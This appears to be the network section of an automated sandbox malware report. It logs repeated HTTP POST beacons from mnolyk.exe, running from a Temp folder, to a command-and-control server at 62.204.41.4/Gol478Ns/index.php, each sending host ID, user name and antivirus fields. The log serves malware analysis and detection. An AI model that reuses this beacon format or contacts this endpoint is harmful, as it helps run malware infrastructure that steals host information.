                            Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 31 34 31 37 30 30 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                            Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=141700&un=user&dm=&av=13&lv=0&og=1
                            Feb 8, 2023 17:37:37.111370087 CET231INHTTP/1.1 200 OK
                            Server: nginx/1.18.0 (Ubuntu)
                            Date: Wed, 08 Feb 2023 16:37:37 GMT
                            Content-Type: text/html; charset=UTF-8
                            Transfer-Encoding: chunked
                            Connection: keep-alive
                            Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                            Data Ascii: 6<c><d>0


                            Session IDSource IPSource PortDestination IPDestination PortProcess
                            420192.168.2.45011562.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                            TimestampkBytes transferredDirectionData
                            Feb 8, 2023 17:39:24.252624989 CET608OUTPOST /Gol478Ns/index.php HTTP/1.1
                            Content-Type: application/x-www-form-urlencoded
                            Host: 62.204.41.4
                            Content-Length: 87
                            Cache-Control: no-cache
                            Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 31 34 31 37 30 30 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                            Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=141700&un=user&dm=&av=13&lv=0&og=1
                            Feb 8, 2023 17:39:24.317740917 CET609INHTTP/1.1 200 OK
                            Server: nginx/1.18.0 (Ubuntu)
                            Date: Wed, 08 Feb 2023 16:39:24 GMT
                            Content-Type: text/html; charset=UTF-8
                            Transfer-Encoding: chunked
                            Connection: keep-alive
                            Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                            Data Ascii: 6<c><d>0


                            Session IDSource IPSource PortDestination IPDestination PortProcess
                            421192.168.2.45011662.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                            TimestampkBytes transferredDirectionData
                            Feb 8, 2023 17:39:24.518582106 CET609OUTPOST /Gol478Ns/index.php HTTP/1.1
                            Content-Type: application/x-www-form-urlencoded
                            Host: 62.204.41.4
                            Content-Length: 87
                            Cache-Control: no-cache
                            Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 31 34 31 37 30 30 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                            Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=141700&un=user&dm=&av=13&lv=0&og=1
                            Feb 8, 2023 17:39:24.583477974 CET610INHTTP/1.1 200 OK
                            Server: nginx/1.18.0 (Ubuntu)
                            Date: Wed, 08 Feb 2023 16:39:24 GMT
                            Content-Type: text/html; charset=UTF-8
                            Transfer-Encoding: chunked
                            Connection: keep-alive
                            Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                            Data Ascii: 6<c><d>0


                            Session IDSource IPSource PortDestination IPDestination PortProcess
                            422192.168.2.45011762.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                            TimestampkBytes transferredDirectionData
                            Feb 8, 2023 17:39:24.763180971 CET610OUTPOST /Gol478Ns/index.php HTTP/1.1
                            Content-Type: application/x-www-form-urlencoded
                            Host: 62.204.41.4
                            Content-Length: 87
                            Cache-Control: no-cache
                            Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 31 34 31 37 30 30 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                            Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=141700&un=user&dm=&av=13&lv=0&og=1
                            Feb 8, 2023 17:39:24.827112913 CET611INHTTP/1.1 200 OK
                            Server: nginx/1.18.0 (Ubuntu)
                            Date: Wed, 08 Feb 2023 16:39:24 GMT
                            Content-Type: text/html; charset=UTF-8
                            Transfer-Encoding: chunked
                            Connection: keep-alive
                            Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                            Data Ascii: 6<c><d>0


                            Session IDSource IPSource PortDestination IPDestination PortProcess
                            423192.168.2.45011862.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                            TimestampkBytes transferredDirectionData
                            Feb 8, 2023 17:39:24.995857000 CET611OUTPOST /Gol478Ns/index.php HTTP/1.1
                            Content-Type: application/x-www-form-urlencoded
                            Host: 62.204.41.4
                            Content-Length: 87
                            Cache-Control: no-cache
                            Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 31 34 31 37 30 30 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                            Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=141700&un=user&dm=&av=13&lv=0&og=1
                            Feb 8, 2023 17:39:25.290040970 CET612OUTPOST /Gol478Ns/index.php HTTP/1.1
                            Content-Type: application/x-www-form-urlencoded
                            Host: 62.204.41.4
                            Content-Length: 87
                            Cache-Control: no-cache
                            Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 31 34 31 37 30 30 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                            Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=141700&un=user&dm=&av=13&lv=0&og=1
                            Feb 8, 2023 17:39:25.354259014 CET612INHTTP/1.1 200 OK
                            Server: nginx/1.18.0 (Ubuntu)
                            Date: Wed, 08 Feb 2023 16:39:25 GMT
                            Content-Type: text/html; charset=UTF-8
                            Transfer-Encoding: chunked
                            Connection: keep-alive
                            Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                            Data Ascii: 6<c><d>0


                            Session IDSource IPSource PortDestination IPDestination PortProcess
                            424192.168.2.45011962.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                            TimestampkBytes transferredDirectionData
                            Feb 8, 2023 17:39:25.527748108 CET613OUTPOST /Gol478Ns/index.php HTTP/1.1
                            Content-Type: application/x-www-form-urlencoded
                            Host: 62.204.41.4
                            Content-Length: 87
                            Cache-Control: no-cache
                            Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 31 34 31 37 30 30 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                            Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=141700&un=user&dm=&av=13&lv=0&og=1
                            Feb 8, 2023 17:39:25.591574907 CET613INHTTP/1.1 200 OK
                            Server: nginx/1.18.0 (Ubuntu)
                            Date: Wed, 08 Feb 2023 16:39:25 GMT
                            Content-Type: text/html; charset=UTF-8
                            Transfer-Encoding: chunked
                            Connection: keep-alive
                            Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                            Data Ascii: 6<c><d>0


                            Session IDSource IPSource PortDestination IPDestination PortProcess
                            425192.168.2.45012062.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                            TimestampkBytes transferredDirectionData
                            Feb 8, 2023 17:39:25.768548965 CET614OUTPOST /Gol478Ns/index.php HTTP/1.1
                            Content-Type: application/x-www-form-urlencoded
                            Host: 62.204.41.4
                            Content-Length: 87
                            Cache-Control: no-cache
                            Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 31 34 31 37 30 30 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                            Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=141700&un=user&dm=&av=13&lv=0&og=1
                            Feb 8, 2023 17:39:25.833265066 CET614INHTTP/1.1 200 OK
                            Server: nginx/1.18.0 (Ubuntu)
                            Date: Wed, 08 Feb 2023 16:39:25 GMT
                            Content-Type: text/html; charset=UTF-8
                            Transfer-Encoding: chunked
                            Connection: keep-alive
                            Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                            Data Ascii: 6<c><d>0


                            Session IDSource IPSource PortDestination IPDestination PortProcess
                            426192.168.2.45012162.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                            TimestampkBytes transferredDirectionData
                            Feb 8, 2023 17:39:26.010780096 CET615OUTPOST /Gol478Ns/index.php HTTP/1.1
                            Content-Type: application/x-www-form-urlencoded
                            Host: 62.204.41.4
                            Content-Length: 87
                            Cache-Control: no-cache
                            Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 31 34 31 37 30 30 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                            Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=141700&un=user&dm=&av=13&lv=0&og=1
                            Feb 8, 2023 17:39:26.078212023 CET615INHTTP/1.1 200 OK
                            Server: nginx/1.18.0 (Ubuntu)
                            Date: Wed, 08 Feb 2023 16:39:26 GMT
                            Content-Type: text/html; charset=UTF-8
                            Transfer-Encoding: chunked
                            Connection: keep-alive
                            Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                            Data Ascii: 6<c><d>0


                            Session IDSource IPSource PortDestination IPDestination PortProcess
                            427192.168.2.45012262.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                            TimestampkBytes transferredDirectionData
                            Feb 8, 2023 17:39:26.248692989 CET616OUTPOST /Gol478Ns/index.php HTTP/1.1
                            Content-Type: application/x-www-form-urlencoded
                            Host: 62.204.41.4
                            Content-Length: 87
                            Cache-Control: no-cache
                            Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 31 34 31 37 30 30 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                            Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=141700&un=user&dm=&av=13&lv=0&og=1
                            Feb 8, 2023 17:39:26.314353943 CET616INHTTP/1.1 200 OK
                            Server: nginx/1.18.0 (Ubuntu)
                            Date: Wed, 08 Feb 2023 16:39:26 GMT
                            Content-Type: text/html; charset=UTF-8
                            Transfer-Encoding: chunked
                            Connection: keep-alive
                            Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                            Data Ascii: 6<c><d>0


                            Session IDSource IPSource PortDestination IPDestination PortProcess
                            428192.168.2.45012362.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                            TimestampkBytes transferredDirectionData
                            Feb 8, 2023 17:39:26.512748957 CET617OUTPOST /Gol478Ns/index.php HTTP/1.1
                            Content-Type: application/x-www-form-urlencoded
                            Host: 62.204.41.4
                            Content-Length: 87
                            Cache-Control: no-cache
                            Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 31 34 31 37 30 30 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                            Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=141700&un=user&dm=&av=13&lv=0&og=1
                            Feb 8, 2023 17:39:26.575915098 CET617INHTTP/1.1 200 OK
                            Server: nginx/1.18.0 (Ubuntu)
                            Date: Wed, 08 Feb 2023 16:39:26 GMT
                            Content-Type: text/html; charset=UTF-8
                            Transfer-Encoding: chunked
                            Connection: keep-alive
                            Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                            Data Ascii: 6<c><d>0


                            Session IDSource IPSource PortDestination IPDestination PortProcess
                            429192.168.2.45012462.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                            TimestampkBytes transferredDirectionData
                            Feb 8, 2023 17:39:26.754786968 CET618OUTPOST /Gol478Ns/index.php HTTP/1.1
                            Content-Type: application/x-www-form-urlencoded
                            Host: 62.204.41.4
                            Content-Length: 87
                            Cache-Control: no-cache
                            Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 31 34 31 37 30 30 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                            Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=141700&un=user&dm=&av=13&lv=0&og=1
                            Feb 8, 2023 17:39:26.819739103 CET618INHTTP/1.1 200 OK
                            Server: nginx/1.18.0 (Ubuntu)
                            Date: Wed, 08 Feb 2023 16:39:26 GMT
                            Content-Type: text/html; charset=UTF-8
                            Transfer-Encoding: chunked
                            Connection: keep-alive
                            Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                            Data Ascii: 6<c><d>0


                            Session IDSource IPSource PortDestination IPDestination PortProcess
                            43192.168.2.44973862.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                            TimestampkBytes transferredDirectionData
                            Feb 8, 2023 17:37:37.329606056 CET232OUTPOST /Gol478Ns/index.php HTTP/1.1
                            Content-Type: application/x-www-form-urlencoded
                            Host: 62.204.41.4
                            Content-Length: 87
                            Cache-Control: no-cache
                            Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 31 34 31 37 30 30 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                            Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=141700&un=user&dm=&av=13&lv=0&og=1
                            Feb 8, 2023 17:37:37.393659115 CET232INHTTP/1.1 200 OK
                            Server: nginx/1.18.0 (Ubuntu)
                            Date: Wed, 08 Feb 2023 16:37:37 GMT
                            Content-Type: text/html; charset=UTF-8
                            Transfer-Encoding: chunked
                            Connection: keep-alive
                            Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                            Data Ascii: 6<c><d>0


                            Session IDSource IPSource PortDestination IPDestination PortProcess
                            430192.168.2.45012562.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                            TimestampkBytes transferredDirectionData
                            Feb 8, 2023 17:39:26.996304035 CET619OUTPOST /Gol478Ns/index.php HTTP/1.1
                            Content-Type: application/x-www-form-urlencoded
                            Host: 62.204.41.4
                            Content-Length: 87
                            Cache-Control: no-cache
                            Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 31 34 31 37 30 30 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                            Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=141700&un=user&dm=&av=13&lv=0&og=1
                            Feb 8, 2023 17:39:27.063054085 CET619INHTTP/1.1 200 OK
                            Server: nginx/1.18.0 (Ubuntu)
                            Date: Wed, 08 Feb 2023 16:39:27 GMT
                            Content-Type: text/html; charset=UTF-8
                            Transfer-Encoding: chunked
                            Connection: keep-alive
                            Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                            Data Ascii: 6<c><d>0


                            Session IDSource IPSource PortDestination IPDestination PortProcess
                            431192.168.2.45012662.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                            TimestampkBytes transferredDirectionData
                            Feb 8, 2023 17:39:27.231065989 CET620OUTPOST /Gol478Ns/index.php HTTP/1.1
                            Content-Type: application/x-www-form-urlencoded
                            Host: 62.204.41.4
                            Content-Length: 87
                            Cache-Control: no-cache
                            Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 31 34 31 37 30 30 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                            Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=141700&un=user&dm=&av=13&lv=0&og=1
                            Feb 8, 2023 17:39:27.294929028 CET620INHTTP/1.1 200 OK
                            Server: nginx/1.18.0 (Ubuntu)
                            Date: Wed, 08 Feb 2023 16:39:27 GMT
                            Content-Type: text/html; charset=UTF-8
                            Transfer-Encoding: chunked
                            Connection: keep-alive
                            Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                            Data Ascii: 6<c><d>0


                            Session IDSource IPSource PortDestination IPDestination PortProcess
                            432192.168.2.45012762.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                            TimestampkBytes transferredDirectionData
                            Feb 8, 2023 17:39:27.463618994 CET621OUTPOST /Gol478Ns/index.php HTTP/1.1
                            Content-Type: application/x-www-form-urlencoded
                            Host: 62.204.41.4
                            Content-Length: 87
                            Cache-Control: no-cache
                            Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 31 34 31 37 30 30 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                            Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=141700&un=user&dm=&av=13&lv=0&og=1
                            Feb 8, 2023 17:39:27.531197071 CET621INHTTP/1.1 200 OK
                            Server: nginx/1.18.0 (Ubuntu)
                            Date: Wed, 08 Feb 2023 16:39:27 GMT
                            Content-Type: text/html; charset=UTF-8
                            Transfer-Encoding: chunked
                            Connection: keep-alive
                            Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                            Data Ascii: 6<c><d>0


                            Session IDSource IPSource PortDestination IPDestination PortProcess
                            433192.168.2.45012862.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                            TimestampkBytes transferredDirectionData
                            Feb 8, 2023 17:39:27.718210936 CET622OUTPOST /Gol478Ns/index.php HTTP/1.1
                            Content-Type: application/x-www-form-urlencoded
                            Host: 62.204.41.4
                            Content-Length: 87
                            Cache-Control: no-cache
                            Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 31 34 31 37 30 30 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                            Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=141700&un=user&dm=&av=13&lv=0&og=1
                            Feb 8, 2023 17:39:27.783216953 CET622INHTTP/1.1 200 OK
                            Server: nginx/1.18.0 (Ubuntu)
                            Date: Wed, 08 Feb 2023 16:39:27 GMT
                            Content-Type: text/html; charset=UTF-8
                            Transfer-Encoding: chunked
                            Connection: keep-alive
                            Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                            Data Ascii: 6<c><d>0


                            Session IDSource IPSource PortDestination IPDestination PortProcess
                            434192.168.2.45012962.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                            TimestampkBytes transferredDirectionData
                            Feb 8, 2023 17:39:27.963603020 CET623OUTPOST /Gol478Ns/index.php HTTP/1.1
                            Content-Type: application/x-www-form-urlencoded
                            Host: 62.204.41.4
                            Content-Length: 87
                            Cache-Control: no-cache
                            Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 31 34 31 37 30 30 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                            Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=141700&un=user&dm=&av=13&lv=0&og=1
                            Feb 8, 2023 17:39:28.028305054 CET623INHTTP/1.1 200 OK
                            Server: nginx/1.18.0 (Ubuntu)
                            Date: Wed, 08 Feb 2023 16:39:27 GMT
                            Content-Type: text/html; charset=UTF-8
                            Transfer-Encoding: chunked
                            Connection: keep-alive
                            Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                            Data Ascii: 6<c><d>0


                            Session IDSource IPSource PortDestination IPDestination PortProcess
                            435192.168.2.45013062.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                            TimestampkBytes transferredDirectionData
                            Feb 8, 2023 17:39:28.215636969 CET624OUTPOST /Gol478Ns/index.php HTTP/1.1
                            Content-Type: application/x-www-form-urlencoded
                            Host: 62.204.41.4
                            Content-Length: 87
                            Cache-Control: no-cache
                            Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 31 34 31 37 30 30 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                            Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=141700&un=user&dm=&av=13&lv=0&og=1
                            Feb 8, 2023 17:39:28.283009052 CET624INHTTP/1.1 200 OK
                            Server: nginx/1.18.0 (Ubuntu)
                            Date: Wed, 08 Feb 2023 16:39:28 GMT
                            Content-Type: text/html; charset=UTF-8
                            Transfer-Encoding: chunked
                            Connection: keep-alive
                            Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                            Data Ascii: 6<c><d>0


                            Session IDSource IPSource PortDestination IPDestination PortProcess
                            436192.168.2.45013162.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                            TimestampkBytes transferredDirectionData
                            Feb 8, 2023 17:39:28.471918106 CET625OUTPOST /Gol478Ns/index.php HTTP/1.1
                            Content-Type: application/x-www-form-urlencoded
                            Host: 62.204.41.4
                            Content-Length: 87
                            Cache-Control: no-cache
                            Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 31 34 31 37 30 30 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                            Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=141700&un=user&dm=&av=13&lv=0&og=1
                            Feb 8, 2023 17:39:28.536655903 CET625INHTTP/1.1 200 OK
                            Server: nginx/1.18.0 (Ubuntu)
                            Date: Wed, 08 Feb 2023 16:39:28 GMT
                            Content-Type: text/html; charset=UTF-8
                            Transfer-Encoding: chunked
                            Connection: keep-alive
                            Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                            Data Ascii: 6<c><d>0


                            Session IDSource IPSource PortDestination IPDestination PortProcess
                            437192.168.2.45013262.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                            TimestampkBytes transferredDirectionData
                            Feb 8, 2023 17:39:28.720657110 CET626OUTPOST /Gol478Ns/index.php HTTP/1.1
                            Content-Type: application/x-www-form-urlencoded
                            Host: 62.204.41.4
                            Content-Length: 87
                            Cache-Control: no-cache
                            Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 31 34 31 37 30 30 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                            Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=141700&un=user&dm=&av=13&lv=0&og=1
                            Feb 8, 2023 17:39:28.783773899 CET626INHTTP/1.1 200 OK
                            Server: nginx/1.18.0 (Ubuntu)
                            Date: Wed, 08 Feb 2023 16:39:28 GMT
                            Content-Type: text/html; charset=UTF-8
                            Transfer-Encoding: chunked
                            Connection: keep-alive
                            Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                            Data Ascii: 6<c><d>0


                            Session IDSource IPSource PortDestination IPDestination PortProcess
                            438192.168.2.45013362.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                            TimestampkBytes transferredDirectionData
                            Feb 8, 2023 17:39:28.968380928 CET627OUTPOST /Gol478Ns/index.php HTTP/1.1
                            Content-Type: application/x-www-form-urlencoded
                            Host: 62.204.41.4
                            Content-Length: 87
                            Cache-Control: no-cache
                            Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 31 34 31 37 30 30 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                            Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=141700&un=user&dm=&av=13&lv=0&og=1
                            Feb 8, 2023 17:39:29.033627033 CET627INHTTP/1.1 200 OK
                            Server: nginx/1.18.0 (Ubuntu)
                            Date: Wed, 08 Feb 2023 16:39:28 GMT
                            Content-Type: text/html; charset=UTF-8
                            Transfer-Encoding: chunked
                            Connection: keep-alive
                            Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                            Data Ascii: 6<c><d>0


